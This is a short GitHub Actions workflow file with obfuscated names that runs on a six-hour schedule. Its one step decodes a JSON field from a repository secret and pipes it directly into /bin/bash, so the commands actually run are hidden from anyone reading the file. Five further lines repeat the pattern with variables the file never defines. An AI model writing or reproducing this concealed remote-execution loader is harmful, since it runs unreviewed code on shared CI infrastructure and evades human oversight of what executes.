name: wangchongtong9527
on:
  workflow_dispatch:
  schedule:
    - cron: '47 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wangchongtong9527
        env:
          efuxg103: ${{ secrets.efuxg103 }}
        run: |
          echo $efuxg103 | jq -r .vzq1 | /bin/bash
          echo $k3 | jq -r .rur394 | /bin/bash
          echo $jxccg05 | jq -r .q08 | /bin/bash
          echo $mi3120 | jq -r .ym5 | /bin/bash
          echo $hdkmw3953 | jq -r .aauj1 | /bin/bash
          echo $bxz14098 | jq -r .r590 | /bin/bash

